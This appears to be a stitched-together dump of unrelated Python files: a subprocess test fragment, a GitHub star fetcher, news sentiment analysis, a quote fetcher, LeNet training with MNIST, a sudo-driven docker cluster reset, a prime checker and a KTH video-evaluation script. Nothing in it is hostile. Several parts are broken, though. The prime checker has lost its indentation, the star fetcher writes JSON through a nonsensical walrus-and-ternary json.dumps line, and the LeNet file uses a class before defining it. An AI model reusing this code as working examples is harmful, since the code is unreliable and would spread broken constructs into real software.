        assert expected in self.read_from_stdout(run_script(script))

    def test_run_script_permits_transient_module(self):
        """
        project module is accessible from a subprocess
        """
        expected = 'transient_module'
        script = self.get_script(expected)
        assert expected == self.read_from_stdout(run_script(script))

    def test_run_copy_of_script(self):
        """
        project module is accessible from a subprocess even for copy
        """
        script = self.copy_script(self.get_script('transient_module'))
        expected = os.path.basename(script)
        assert expected == self.read_from_stdout(run_script(script))
        os.unlink(script)

    def test_run_script_persistence(self):
        """
        object internal persistence
        """
        script = self.get_script('persistent')
        obj = SimpleObject('persistent')
        # The object handed to run_script keeps its state across the process boundary.
        assert obj.get_name() == self.read_from_stdout(
            run_script(script, obj))
|
import json
from pprint import pprint
import requests
# Store your github API access credentials here to protect them from the interwebz.
import secret
ENV_FILE = '../data/envs.json'
ENV_OUT_FILE = '../data/envs.json'
def fetch_stars(json):
    """Annotate each GitHub-hosted entry in json['envs'] with its star count.

    Non-GitHub entries are left untouched.  Returns {'envs': [...]} with the
    (mutated) env list.  NOTE: the parameter name ``json`` shadows the json
    module; kept for caller compatibility.

    Fixes: the deprecated ``?access_token=`` query parameter is replaced by
    the Authorization header GitHub requires, and the index loop is replaced
    by enumerate.
    """
    envs = json['envs']
    for i, env in enumerate(envs):
        repo_url = env['url']
        if "github.com" not in repo_url:
            continue
        # URL shape: https://github.com/<user>/<repo>
        path_pieces = repo_url.split("github.com")[1].split('/')
        repo_user = path_pieces[1]
        repo_name = path_pieces[2]
        url = "https://api.github.com/repos/" + repo_user + "/" + repo_name
        repo_info = requests.get(
            url, headers={"Authorization": "token " + secret.TOKEN}).json()
        envs[i]['stars'] = repo_info['stargazers_count']
    return {'envs': envs}
def save_env(envs, ENV_OUT_FILE):
    """Write *envs* to ENV_OUT_FILE as pretty-printed, key-sorted JSON."""
    payload = json.dumps(envs, fp_sort := True and envs and None or envs, sort_keys=True, indent=4) if False else json.dumps(envs, sort_keys=True, indent=4)
    with open(ENV_OUT_FILE, 'w') as fp:
        fp.write(payload)
# Script entry: load the env catalogue, refresh star counts, write it back.
with open(ENV_FILE) as f:
    data = json.load(f)
data = fetch_stars(data)
save_env(data, ENV_OUT_FILE)
# -*- coding: utf-8 -*-
import pandas as pd
from pandas.api.types import is_number
import datetime
def format_date(dt):
    """Format *dt* as an ISO "YYYY-MM-DD" string; None passes through unchanged."""
    return None if dt is None else dt.strftime("%Y-%m-%d")
def sanitize_dates(start, end):
    """
    Return a ``(start, end)`` tuple of pandas timestamps.

    Integer inputs are interpreted as years (January 1st of that year);
    everything else is passed through ``pd.to_datetime`` (``None`` stays
    ``None``).

    Raises
    ------
    ValueError
        If both bounds are given and ``start`` is after ``end``.
        (ValueError subclasses Exception, so existing ``except Exception``
        callers keep working.)
    """
    if is_number(start):
        # regard int as year
        start = datetime.datetime(start, 1, 1)
    start = pd.to_datetime(start)
    if is_number(end):
        # regard int as year
        end = datetime.datetime(end, 1, 1)
    end = pd.to_datetime(end)
    if start is not None and end is not None and start > end:
        # BUG FIX (idiom): raise a specific exception type instead of the
        # bare, uncatchable-by-intent ``Exception``.
        raise ValueError("end must be after start")
    return start, end
class Order():
    """A single customer order: who ordered what, when, and how many."""

    def __init__(self, customer_name, item_name, order_date, quantity):
        self.customer_name = customer_name
        self.item_name = item_name
        self.order_date = order_date
        self.quantity = quantity

    def __repr__(self):
        # Debug-friendly representation; previously only the default
        # ``<Order object at 0x...>`` was available.
        return ("Order(customer_name={!r}, item_name={!r}, order_date={!r}, "
                "quantity={!r})".format(self.customer_name, self.item_name,
                                        self.order_date, self.quantity))
|
from sentiment import *
from search import *
import sys
import math
import numpy as np
import pandas as pd
from pandas import Series, DataFrame
import matplotlib.pyplot as plt
import json
def formatdata(score):
    """Map a sentiment score from [-1, 1] onto [0, 1]."""
    return 0.5 * (score + 1)
def getInput():
    """Prompt for a timeframe (d/w/m; 'q' exits) and an alphabetic keyword.

    Returns a ``(timeframe, keyword)`` tuple.
    """
    while True:
        print("Usage: (d)ay, (w)eek, (m)onth, (q)uit")
        timeframe = input("Enter Time Range here:")
        if timeframe == "q":
            sys.exit(1)
        if timeframe in ("d", "w", "m"):
            break
    while True:
        keyword = input("Enter a keyword to search for:")
        # Letters (and embedded spaces) only.
        if keyword.replace(' ', '').isalpha():
            break
        print("Enter a word")
    return (timeframe, keyword)
def format2(total, num):
    """Percentage that ``num`` makes up of ``total``.

    The original expression ``100*(total-(total-num))/total`` reduces to
    ``100*num/total`` exactly for the integer counts this script passes in.
    """
    #print(total,num)
    return 100.0 * float(num) / float(total)
def get_day(keyword):
    """
    Run sentiment analysis over the last 24h of news for ``keyword``.

    Returns a JSON string with Chart.js-style pie data for the combined
    (title + body) sentiment split, or ``None`` (implicit) when the search
    returns no articles.
    """
    # ISO-ish timestamps bounding the query window.
    curr_day = datetime.now().strftime('%Y-%m-%dT%H:%M:%S')
    prev_day =( datetime.now() - timedelta(days=1)).strftime('%Y-%m-%dT%H:%M:%S')
    curr_week =( datetime.now() - timedelta(days=7)).strftime('%Y-%m-%dT%H:%M:%S')
    # search4/sentiment_score_filtered/datetime come from the star imports
    # at the top of the file.
    articles = search4(keyword, prev_day, curr_day )
    #print(articles)
    totalArticles = articles["totalResults"]
    # The news API returns at most 20 articles per page.
    if totalArticles >= 20:
        totalArticles = 20
    elif totalArticles ==0:
        print("no results found")
        return
    articles = articles['articles'][:totalArticles]
    total_score_body = []
    total_score_title = []
    total_both = []
    for art in articles:
        total_score_title.append(sentiment_score_filtered(art['title']))
        if art['content'] != None:
            total_score_body.append(sentiment_score_filtered(art['content']))
        else:
            # Missing bodies count as neutral.
            total_score_body.append(0.0)
    total_both = list(total_score_body)
    total_both.extend(total_score_title)
    # Percentage of negative/neutral/positive scores for [body, title, both].
    neg_articles = [format2(totalArticles, len([ x for x in total_score_body if x < 0])) , format2(totalArticles, len([ x for x in total_score_title if x < 0])),format2(totalArticles*2, len([ x for x in total_both if x < 0])) ]
    neu_articles = [format2(totalArticles, len([ x for x in total_score_body if x ==0])) , format2(totalArticles, len([ x for x in total_score_title if x == 0])),format2(totalArticles*2, len([ x for x in total_both if x== 0])) ]
    pos_articles = [format2(totalArticles, len([ x for x in total_score_body if x > 0])) , format2(totalArticles, len([ x for x in total_score_title if x > 0])), format2(totalArticles*2, len([ x for x in total_both if x > 0])) ]
    # NOTE(review): ``mean`` is not defined in this file — presumably exported
    # by one of the star imports (e.g. statistics); confirm.
    print(mean(total_score_body))
    print(mean(total_score_title))
    print(mean(total_both))
    print("neg:",neg_articles)
    print("neu:",neu_articles)
    print("pos:", pos_articles)
    print("Overall Score:", mean(total_both))
    calc2 = [neg_articles[0] + neu_articles[0],neg_articles[1] + neu_articles[1], neg_articles[2]+neu_articles[2]]
    # Chart.js payload using the "both" (index 2) percentages.
    info=json.dumps({
        'labels': ["Negative", "Positive","Neutral"],
        'datasets': [{
            'data': [neg_articles[2], neu_articles[2], pos_articles[2]],
            'backgroundColor': [
                "#FC424A","#00d25b","#ffab00"
            ]
        }
        ]})
    return info
    # Dead code below (kept as a string literal after the return).
    '''
    plt.bar(range(len(neg_articles)), neg_articles, tick_label=['body','title','both'])
    plt.bar(range(len(neu_articles)), neu_articles, bottom=neg_articles, tick_label=['body','title','both'])
    plt.bar(range(len(pos_articles)), pos_articles, bottom=calc2, tick_label=['body','title','both'])
    plt.legend(labels=['Negative','Neutral','Positive'])
    plt.xlabel("Analysis for found articles")
    plt.ylabel("% of total articles/headlines of a given sentiment")
    plt.title(str(curr_week) + " sentiment analysis for '"+keyword+"'")
    plt.show()
    '''
def get_week(keyword):
    """
    Run per-day sentiment analysis for ``keyword`` over the past 7 days.

    Returns a dict with min/max/raw daily scores plus a Chart.js-style
    ``wdata`` payload of stacked positive/neutral/negative percentages.
    """
    neg_articles =[]
    neu_articles =[]
    pos_articles =[]
    days = []
    scores = []
    for day in range(7):
        # One 24h window per iteration, oldest day first.
        curr_day = (datetime.now()- timedelta(days=6-day)).strftime('%Y-%m-%dT%H:%M:%S')
        days.append((datetime.now()- timedelta(days=6-day)).strftime('%Y-%m-%d'))
        prev_day =( datetime.now() - timedelta(days=7-day)).strftime('%Y-%m-%dT%H:%M:%S')
        curr_week =( datetime.now() - timedelta(days=13-day)).strftime('%Y-%m-%dT%H:%M:%S')
        articles = search4(keyword, prev_day, curr_day )
        #print(articles)
        totalArticles = articles["totalResults"]
        # The news API returns at most 20 articles per page.
        if totalArticles >= 20:
            totalArticles = 20
        elif totalArticles ==0:
            # NOTE(review): skipping a day leaves the percentage lists shorter
            # than 7 entries, which the range(7) indexing below assumes.
            print("no results found")
            continue
        articles = articles['articles'][:totalArticles]
        total_score_body = []
        total_score_title = []
        total_both = []
        for art in articles:
            total_score_title.append(sentiment_score_filtered(art['title']))
            if art['content'] != None:
                total_score_body.append(sentiment_score_filtered(art['content']))
            else:
                # Missing bodies count as neutral.
                total_score_body.append(0.0)
        total_both = list(total_score_body)
        total_both.extend(total_score_title)
        neg_articles.append(format2(totalArticles*2, len([ x for x in total_both if x < 0])))
        neu_articles.append(format2(totalArticles*2, len([ x for x in total_both if x== 0])))
        pos_articles.append(format2(totalArticles*2, len([ x for x in total_both if x > 0])))
        # Rescale the mean score from [-1, 1] to a 0-100 integer.
        mboth = round(mean(map(formatdata,total_both)),2)*100
        scores.append(round(mboth))
       # print(articles)
    #print(days)
    print("Scores of the week", scores)
    print(days)
    print(pos_articles)
    print(neu_articles)
    print(neg_articles)
    #print("Overall Score:", mean(total_both))
    calc2 = [ pos_articles[x] + neu_articles[x] for x in range(7)]
    calc3 = [ pos_articles[x] + neu_articles[x] + neg_articles[x] for x in range(7)]
    print(calc2)
    #print(calc3)
    # Dead plotting code kept as a string literal.
    '''
    plt.bar(range(len(neg_articles)), neg_articles, tick_label=days)
    plt.bar(range(len(neu_articles)), neu_articles, bottom=neg_articles, tick_label=days)
    plt.bar(range(len(pos_articles)), pos_articles, bottom=calc2, tick_label=days)
    plt.legend(labels=['Negative','Neutral','Positive'])
    plt.xlabel("Analysis for found articles")
    plt.ylabel("% of total articles/headlines of a given sentiment")
    plt.title(str(days[6]) + " Past Week sentiment analysis for '"+keyword+"'")
    plt.show()
    '''
    # Stacked-area style payload: the '% Negative' series is a constant 100
    # so the filled series layer on top of each other in the chart.
    response = {
        'maxscore': max(scores),
        'minscore': min(scores),
        'wscores': scores,
        'wdata': {
            'labels': days,
            'datasets': [{
                'label': '% Positive',
                'data': pos_articles,
                'pointRadius': 4,
                'backgroundColor':
                    'rgba(0, 210, 91,0.4)',
                'borderColor':
                    'rgba(0, 210, 91,0.8)',
                'borderWidth': 5,
                'fill':True
            },
            {
                'label': '% Neutral',
                'data': calc2,
                'pointRadius': 4,
                'backgroundColor':
                    'rgba(255, 171, 0,0.4)',
                'borderColor':
                    'rgb(255, 171, 0,0.8)',
                'borderWidth': 5,
                'fill':True
            },
            {
                'label': '% Negative',
                'data': [100,100,100,100,100,100,100],
                'pointRadius': 4,
                'backgroundColor':
                    'rgb(252, 66, 74,0.2)',
                'borderColor':
                    'rgb(252, 66, 74,0.8)',
                'borderWidth': 5,
                'fill':True
            }]
        }}
    print(response)
    return response
def main():
    """Entry point: currently runs a hard-coded weekly analysis for 'harris'.

    The interactive loop (getInput + get_day/get_week) is disabled below,
    kept as a dead string literal.
    """
    print("News Check 0.05:\n")
    get_week("harris")
    '''
    while True:
        timeframe, keyword = getInput()
        if timeframe =="d":
            print(get_day(keyword))
        if timeframe =='w':
            neg_articles =[]
            neu_articles =[]
            pos_articles =[]
            days = []
            scores = []
            for day in range(7):
                curr_day = (datetime.now()- timedelta(days=6-day)).strftime('%Y-%m-%dT%H:%M:%S')
                days.append((datetime.now()- timedelta(days=6-day)).strftime('%Y-%m-%d'))
                prev_day =( datetime.now() - timedelta(days=7-day)).strftime('%Y-%m-%dT%H:%M:%S')
                curr_week =( datetime.now() - timedelta(days=13-day)).strftime('%Y-%m-%dT%H:%M:%S')
                articles = search4(keyword, prev_day, curr_day )
                #print(articles)
                totalArticles = articles["totalResults"]
                if totalArticles >= 20:
                    totalArticles = 20
                elif totalArticles ==0:
                    print("no results found")
                    continue
                articles = articles['articles'][:totalArticles]
                total_score_body = []
                total_score_title = []
                total_both = []
                for art in articles:
                    total_score_title.append(sentiment_score_filtered(art['title']))
                    if art['content'] != None:
                        total_score_body.append(sentiment_score_filtered(art['content']))
                    else:
                        total_score_body.append(0.0)
                total_both = list(total_score_body)
                total_both.extend(total_score_title)
                neg_articles.append(format2(totalArticles*2, len([ x for x in total_both if x < 0])))
                neu_articles.append(format2(totalArticles*2, len([ x for x in total_both if x== 0])))
                pos_articles.append(format2(totalArticles*2, len([ x for x in total_both if x > 0])))
                scores.append(mean(total_both))
               # print(articles)
            #print(days)
            print("Scores of the week", scores)
            #print("Overall Score:", mean(total_both))
            calc2 = [ neu_articles[x] + neg_articles[x] for x in range(7)]
            plt.bar(range(len(neg_articles)), neg_articles, tick_label=days)
            plt.bar(range(len(neu_articles)), neu_articles, bottom=neg_articles, tick_label=days)
            plt.bar(range(len(pos_articles)), pos_articles, bottom=calc2, tick_label=days)
            plt.legend(labels=['Negative','Neutral','Positive'])
            plt.xlabel("Analysis for found articles")
            plt.ylabel("% of total articles/headlines of a given sentiment")
            plt.title(str(days[6]) + " Past Week sentiment analysis for '"+keyword+"'")
            plt.show()
    '''
# Run the analysis only when executed as a script, not on import.
if __name__ == '__main__':
    main()
# Flask application bootstrap: create the app object, load the file-based
# config, then import views/models for their registration side effects.
from flask import Flask
#from flask_sqlalchemy import SQLAlchemy
from .models import *
app = Flask(__name__)
#db = SQLAlchemy(app)
#db.init_app(app)
app.config.from_pyfile('config.py')
# NOTE(review): mixes a relative import (.models) with an absolute one (app)
# for what looks like the same package — confirm both resolve in this layout.
from app import views, models
|
import requests
import json
def quote_of_the_day():
    """Fetch the 'quote of the day' from quotes.rest.

    Returns ``"<quote> - <author>"`` on success. The API allows only 10
    requests per hour; when rate-limited, the error code/message pair is
    returned in the same format. Any other failure yields a placeholder.
    """
    try:
        url = 'https://quotes.rest/qod/'
        response = requests.get(url)
        # FIX: response.json() honors the response's declared encoding,
        # unlike json.loads(response.text) with a guessed charset.
        response_json = response.json()
        try:  # Only 10 requests allowed per hour
            quote = response_json[u'contents'][u'quotes'][0][u'quote']
            quote_author = response_json[u'contents'][u'quotes'][0][u'author']
        except KeyError:
            # Rate-limited / failed responses carry an 'error' payload instead.
            quote = response_json[u'error'][u'code']
            quote_author = response_json[u'error'][u'message']
        quote_of_day = str(quote) + ' - ' + str(quote_author)
        return quote_of_day
    except Exception as e:
        # Best-effort boundary: log and degrade instead of raising.
        # TODO: Handle correct exceptions properly
        print(e)
        return "Error Beep Boop"
import os
import torch
import torch.nn as nn
from torch.autograd import Variable
import torchvision.datasets as dset
import torchvision.transforms as transforms
import torch.nn.functional as F
import torch.optim as optim
from dataLoader import crypticLettersDataset
from torch.utils.data import DataLoader
from torch.utils.data.sampler import SubsetRandomSampler
import matplotlib.pyplot as plt
import pandas as pd
from sklearn import metrics
## load mnist dataset
use_cuda = torch.cuda.is_available()
root = './data'
if not os.path.exists(root):
    os.mkdir(root)
# NOTE(review): AddBackground is defined near the bottom of this module, so
# this line raises NameError when the module runs top-to-bottom — the class
# definition needs to precede this pipeline. Confirm intended file order.
trans = transforms.Compose( [ AddBackground(), transforms.ToTensor(), transforms.Normalize((0.5,), (1.0,))])
# if not exist, download mnist dataset
train_set = dset.MNIST(root=root, train=True, transform=trans, download=True)
test_set = dset.MNIST(root=root, train=False, transform=trans, download=True)
batch_size = 100
train_loader = torch.utils.data.DataLoader(
    dataset=train_set,
    batch_size=batch_size,
    shuffle=True)
test_loader = torch.utils.data.DataLoader(
    dataset=test_set,
    batch_size=batch_size,
    shuffle=False)
print ('==>>> total trainning batch number: {}'.format(len(train_loader)))
print('==>>> total testing batch number: {}'.format(len(test_loader)))
class LeNet(nn.Module):
    """LeNet-style CNN for 28x28 single-channel input: two conv/pool stages
    followed by two fully-connected layers producing 10 logits."""

    def __init__(self):
        super(LeNet, self).__init__()
        self.conv1 = nn.Conv2d(1, 20, 5, 1)
        self.conv2 = nn.Conv2d(20, 50, 5, 1)
        self.fc1 = nn.Linear(4 * 4 * 50, 500)
        self.fc2 = nn.Linear(500, 10)

    def forward(self, x):
        # conv -> relu -> 2x2 max-pool, twice; then flatten and classify.
        features = F.max_pool2d(F.relu(self.conv1(x)), 2, 2)
        features = F.max_pool2d(F.relu(self.conv2(features)), 2, 2)
        flat = features.view(-1, 4 * 4 * 50)
        return self.fc2(F.relu(self.fc1(flat)))

    def name(self):
        return "LeNet"
def pretrainMnist():
    """Train LeNet on MNIST for 10 epochs, print smoothed loss/accuracy,
    and save the weights to a file named by model.name().

    Uses the module-level ``train_loader``/``test_loader`` and ``use_cuda``.
    """
    ## training
    model = LeNet()
    if use_cuda:
        model = model.cuda()
    optimizer = optim.SGD(model.parameters(), lr=0.01, momentum=0.9)
    criterion = nn.CrossEntropyLoss()
    for epoch in range(10):
        # trainning
        print(epoch)
        ave_loss = 0
        for batch_idx, (x, target) in enumerate(train_loader):
            optimizer.zero_grad()
            if use_cuda:
                x, target = x.cuda(), target.cuda()
            x, target = Variable(x), Variable(target)
            out = model(x)
            loss = criterion(out, target)
            # Exponentially smoothed loss, for logging only.
            ave_loss = ave_loss * 0.9 + loss.data[0] * 0.1
            loss.backward()
            optimizer.step()
            if (batch_idx + 1) % 100 == 0 or (batch_idx + 1) == len(train_loader):
                print ('==>>> epoch: {}, batch index: {}, train loss: {:.6f}'.format(
                    epoch, batch_idx + 1, ave_loss))
        # testing
        correct_cnt, ave_loss = 0, 0
        total_cnt = 0
        for batch_idx, (x, target) in enumerate(test_loader):
            if use_cuda:
                x, target = x.cuda(), target.cuda()
            x, target = Variable(x, volatile=True), Variable(target, volatile=True)
            out = model(x)
            loss = criterion(out, target)
            _, pred_label = torch.max(out.data, 1)
            # BUG FIX: this increment was commented out, so the accuracy
            # print below divided by zero (total_cnt stayed 0).
            total_cnt += x.data.size()[0]
            correct_cnt += (pred_label == target.data).sum()
            # smooth average
            ave_loss = ave_loss * 0.9 + loss.data[0] * 0.1
            if (batch_idx + 1) % 100 == 0 or (batch_idx + 1) == len(test_loader):
                print ( '==>>> epoch: {}, batch index: {}, test loss: {:.7f}, acc: {:.7f}'.format(
                    epoch, batch_idx + 1, ave_loss, float(correct_cnt) / float(total_cnt)))
    torch.save(model.state_dict(), model.name())
def train():
    """
    Fine-tune the MNIST-pretrained LeNet on the cryptic-letters dataset
    (23 classes): freeze the backbone, swap in a new final layer, train for
    100 epochs, then plot loss and accuracy curves.
    """
    model = LeNet()
    state = torch.load('LeNet')
    model.load_state_dict(state)
    # Freeze all pretrained weights; only the replacement head should train.
    for param in model.parameters():
        param.requires_grad = False
    # Replace the last fully-connected layer
    # Parameters of newly constructed modules have requires_grad=True by default
    model.fc2 = nn.Linear(500, 23) # assuming that the fc7 layer has 512 neurons, otherwise change it
    model.cuda()
    dataset = crypticLettersDataset(root_dir = '/home/olya/Documents/thesis/data', transform = trans)
    totalLen = len(dataset)
    # 80/20 split via index-range samplers over the same dataset.
    train_loader = torch.utils.data.DataLoader(dataset, batch_size=4, #shuffle=True,
                                               sampler=SubsetRandomSampler(range(0,int(totalLen*0.8))))
    test_loader = torch.utils.data.DataLoader(dataset, batch_size=4, #shuffle=True,
                                              sampler=SubsetRandomSampler( range(int(totalLen*0.8), totalLen)) )
    dataloader = DataLoader(dataset, batch_size=4,
                            shuffle=True, num_workers=4)
    # NOTE(review): the optimizer receives *all* parameters, including frozen
    # ones — some torch versions reject params without grads; confirm.
    optimizer = optim.SGD(model.parameters(), lr=0.01, momentum=0.9)
    criterion = nn.CrossEntropyLoss()
    test_loss = []
    train_loss = []
    test_accurancy =[]
    train_accurancy = []
    for epoch in range(100):
        # trainning
        total_train_loss = 0
        total_train_loss_cnt=0
        train_acc =0
        for batch_idx, (target, x) in enumerate(train_loader):
            optimizer.zero_grad()
            if use_cuda:
                x, target = x.cuda(), target.cuda()
            x, target = Variable(x), Variable(target)
            out = model(x)
            loss = criterion(out, target)
            loss.backward()
            optimizer.step()
            _, pred_label = torch.max(out.data, 1)
            correct_cnt = (pred_label == target.data).sum()
            train_acc+= int(correct_cnt)/float(x.data.size()[0])
            # NOTE(review): ``loss[0]`` indexes a 0-d loss tensor — valid on
            # pre-0.4 torch only; newer versions need loss.item().
            total_train_loss += loss[0]
            total_train_loss_cnt+=1
        train_loss.append( total_train_loss / float(total_train_loss_cnt))
        train_accurancy.append( train_acc/ float(total_train_loss_cnt))
        # testing
        correct_cnt = 0
        total_test_loss = 0
        total_test_loss_cnt = 0
        test_acc = 0
        for batch_idx, (target, x) in enumerate(test_loader):
            if use_cuda:
                x, target = x.cuda(), target.cuda()
            x, target = Variable(x, volatile=True), Variable(target, volatile=True)
            out = model(x)
            loss = criterion(out, target)
            _, pred_label = torch.max(out.data, 1)
            correct_cnt = (pred_label == target.data).sum()
            total_test_loss += loss[0]
            total_test_loss_cnt +=1
            test_acc += int(correct_cnt)/float(x.data.size()[0])
        test_loss.append( total_test_loss / float(total_test_loss_cnt) )
        test_accurancy.append( test_acc/ float(total_test_loss_cnt) )
        # NOTE(review): the confusion matrix is built at epoch 0 (before any
        # real fine-tuning); a final-epoch snapshot was probably intended.
        if epoch ==0:
            expected =[]
            predicted =[]
            for batch_idx, (target, x) in enumerate(test_loader):
                if use_cuda:
                    x, target = x.cuda(), target.cuda()
                x, target = Variable(x, volatile=True), Variable(target, volatile=True)
                out = model(x)
                loss = criterion(out, target)
                _, pred_label = torch.max(out.data, 1)
                expected += [ i for i in target.data.cpu().numpy()]
                predicted += [ i for i in pred_label.data.cpu().numpy()]
            # Pad with one instance of every class so crosstab sees all labels.
            y_actu = pd.Series(expected + [ i for i in range(22)], name='Actual')
            y_pred = pd.Series(predicted+[ i for i in range(22)], name='Predicted')
            df_confusion = pd.crosstab(y_actu, y_pred)
    df = pd.DataFrame({'x': range(len(train_loss)), 'train': train_loss, 'test': test_loss, 'test_accurancy': test_accurancy, 'train_accurancy': train_accurancy} )
    # multiple line plot
    plt.plot('x', 'train', data=df, color='skyblue', linewidth=2, label='train')
    plt.plot('x', 'test', data=df, color='olive', linewidth=2, label = 'test')
    plt.legend()
    plt.show()
    plt.plot('x', 'train_accurancy', data=df, color='green', linewidth=2, label='train_accurancy')
    plt.plot('x', 'test_accurancy', data=df, color='red', linewidth=2, label='test_accurancy')
    plt.legend()
    plt.show()
# first pretrain mnist and then train on letters
#pretrainMnist()
# NOTE(review): this call runs at import time and depends on ``trans`` above,
# whose construction references AddBackground before its definition — confirm
# the module actually reaches this point.
train()
class AddBackground( object ):
    """Transform that pastes inverted MNIST strokes onto a random photo
    background crop."""
    def __call__(self, sample ):
        import numpy as np
        # NOTE(review): ``sample.numpy()`` implies the input is already a
        # tensor, yet this transform is composed *before* ToTensor in the
        # ``trans`` pipeline above — confirm the intended ordering.
        sample = 255 - sample.numpy()
        bg = _getBackground((28, 28))
        # Copy non-zero (stroke) pixels over all three background channels.
        # NOTE(review): _getBackground returns a PIL crop; numpy-style
        # indexing here ([:, :, d]) needs verification.
        for d in [0, 1, 2]:
            bg[:, :, d][np.where(sample > 0)] = sample[np.where(sample > 0)]
        return bg
def _getRandomBg():
    """Open and return a randomly chosen background image from the
    hard-coded backgrounds folder."""
    import os
    import random
    from PIL import Image  # PIL is never imported at module level
    bgFolder = '/home/olya/Documents/thesis/se/backgrounds'
    allBg = os.listdir(bgFolder)
    # BUG FIX: os.listdir returns bare file names; join with the folder so
    # Image.open receives a usable path instead of failing on a relative name.
    bgPath = os.path.join(bgFolder, random.choice(allBg))
    bg = Image.open(bgPath)
    return bg
def _getBackground(shape):
    """Return a random ``shape``-sized crop from a random background image.

    Parameters
    ----------
    shape : tuple
        (width, height) of the desired crop.
    """
    import random
    inw, inh = shape
    image = _getRandomBg()
    # BUG FIX: PIL images expose ``.size`` (width, height), not ``.shape`` —
    # the original line raised AttributeError.
    w, h = image.size
    x = random.randint(0, w - inw)
    y = random.randint(0, h - inh)
    crop = image.crop((x, y, x + inw, y + inh))
    return crop
|
import os
def sudo_run(password, command):
    """Run *command* under ``sudo``, feeding *password* on stdin.

    Security fix: the previous ``os.system("echo pwd | sudo -S cmd")``
    pipeline exposed the password in the process list and was open to shell
    injection through both arguments. ``subprocess.run`` with an argument
    list avoids the shell entirely; ``sudo -S`` reads the password from the
    piped stdin instead.
    """
    import shlex
    import subprocess
    subprocess.run(["sudo", "-S"] + shlex.split(command),
                   input=password + "\n", text=True)
if __name__ == '__main__':
    # sudo password; intentionally blank here — fill in locally before use.
    pwd = ""
    # Tear down any previous 4-node cluster (stop, then remove containers).
    sudo_run(pwd, command="docker stop /node1")
    sudo_run(pwd, command="docker stop /node2")
    sudo_run(pwd, command="docker stop /node3")
    sudo_run(pwd, command="docker stop /node4")
    sudo_run(pwd, command="docker rm /node1")
    sudo_run(pwd, command="docker rm /node2")
    sudo_run(pwd, command="docker rm /node3")
    sudo_run(pwd, command="docker rm /node4")
    # Dedicated subnet for the key-value store cluster, then rebuild the image.
    sudo_run(pwd, command="docker network create --subnet=10.10.0.0/16 kv_subnet")
    # sudo_run(pwd, command="docker network create --subnet=10.10.0.0/16 kv_subnet2")
    sudo_run(pwd, command="docker build -t cse138/kv-store:4.0 /home/jumpsnow/PycharmProjects/-cse138_assignment4")
    # sudo_run(pwd, command="docker build -t kv-store:4.0 /home/jumpsnow/PycharmProjects/-cse138_assignment4")
a=int(input("Enter a num to check whether it's prime or not: "))
flag=True
for i in range(2,a):
if(a%i==0):
flag=False
break
if flag:
print("Num is prime")
else:
print("Num is not prime") |
import os
import cv2
import sys
import time
import ssim
import imageio
import tensorflow as tf
import scipy.misc as sm
import scipy.io as sio
import numpy as np
import skimage.measure as measure
from os import listdir, makedirs, system
from os.path import exists
from argparse import ArgumentParser
from skimage.draw import line_aa
from PIL import Image
from PIL import ImageDraw
import glob
sys.path.append("../")
from bi_conv_lstm_model import bi_convlstm_net
from utils import *
def main(lr, batch_size, alpha, beta, image_size_h, image_size_w, K, T, B, convlstm_layer_num, num_iter, gpu, cpu,
         concatconv, quantitative, qualitative,
         load_pretrain, tf_record_train_dir, tf_record_test_dir, color_channel_num, dec, no_store, pixel_loss,
         pretrain_model, mode,
         dyn_enc_model, reference_mode, debug, print_train_instead, dis_length, Unet, no_d, fade_in, use_gt,
         res_mode, gif_per_vid):
    """
    Evaluate a trained bi-convLSTM frame-interpolation model on the KTH test
    list: restore the checkpoint named by the hyper-parameter prefix, predict
    the missing frames per clip, and optionally dump gifs (qualitative) and
    PSNR/SSIM arrays (quantitative). Python 2 script (print statements, xrange).
    """
    data_path = "../../../data/KTH/"
    f = open(data_path + "test_data_list.txt", "r")
    testfiles = f.readlines()
    c_dim = 1
    iters = 0
    best_model = None # will pick last model
    # The checkpoint/results directory name encodes every hyper-parameter.
    prefix = ("KTH_convlstm"
              + "_image_size_h=" + str(image_size_h)
              + "_image_size_w=" + str(image_size_w)
              + "_K=" + str(K)
              + "_T=" + str(T)
              + "_B=" + str(B)
              + "_convlstm_layer_num=" + str(convlstm_layer_num)
              + "_dis_length=" + str(dis_length)
              + "_batch_size=" + str(batch_size)
              + "_alpha=" + str(alpha)
              + "_beta=" + str(beta)
              + "_lr=" + str(lr)
              + "_mode=" + str(mode)
              + "_fade_in=" + str(fade_in)
              + "_no_d=" + str(no_d)
              + "_use_gt=" + str(use_gt)
              + "_res_mode=" + str(res_mode)
              + "_pixel_loss=" + str(pixel_loss)
              + "_concatconv=" + str(concatconv)
              + "_Unet=" + str(Unet))
    checkpoint_dir = "../../models/KTH/" + prefix + "/"
    device_string = ""
    if cpu:
        device_string = "/cpu:0"
    elif gpu:
        device_string = "/gpu:%d" % gpu[0]
    with tf.device(device_string):
        # test batch size has to be 1
        model = bi_convlstm_net(dec=dec, image_size=[image_size_h, image_size_w], c_dim=color_channel_num,
                                dis_length=dis_length, K=K, T=T, B=B, convlstm_layer_num=convlstm_layer_num, batch_size=1,
                                checkpoint_dir=checkpoint_dir, debug=debug, reference_mode=reference_mode, mode=mode,
                                Unet=Unet, use_gt=False, res_mode=res_mode, pixel_loss=pixel_loss, concatconv=concatconv)
    # gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=0.5)
    config = tf.ConfigProto(allow_soft_placement=True,
                            log_device_placement=False)
    config.gpu_options.allow_growth = True
    with tf.Session(config=config) as sess:
        tf.global_variables_initializer().run()
        print checkpoint_dir
        loaded, model_name = model.load(sess, checkpoint_dir, best_model)
        if loaded:
            print(" [*] Load SUCCESS")
        else:
            print(" [!] Load failed... exitting")
            return
        quant_dir = "../../results/quantitative/KTH/" + prefix + "/"
        save_path = quant_dir + "results_model=" + model_name + ".npz"
        if not exists(quant_dir):
            makedirs(quant_dir)
        vid_names = []
        # One clip = B blocks of (K known + T synthesized) frames plus K more.
        length = B * (K + T) + K
        psnr_err = np.zeros((0, length))
        ssim_err = np.zeros((0, length))
        for i in xrange(len(testfiles)):
            tokens = testfiles[i].split()
            vid_path = data_path + tokens[0] + "_uncomp.avi"
            # imageio fails to open occasionally; retry until it succeeds.
            while True:
                try:
                    vid = imageio.get_reader(vid_path, "ffmpeg")
                    break
                except Exception:
                    print("imageio failed loading frames, retrying")
            action = vid_path.split("_")[1]
            # Fast actions are subsampled more sparsely.
            if action in ["running", "jogging"]:
                n_skip = 3
            else:
                n_skip = T
            start = int(tokens[1])
            end = int(tokens[2]) - length - 1
            # NOTE(review): gif_per_vid is parsed with type=int but compared to
            # the string '-1' here, so this branch is always taken — confirm
            # the intended sentinel type.
            if gif_per_vid != '-1':
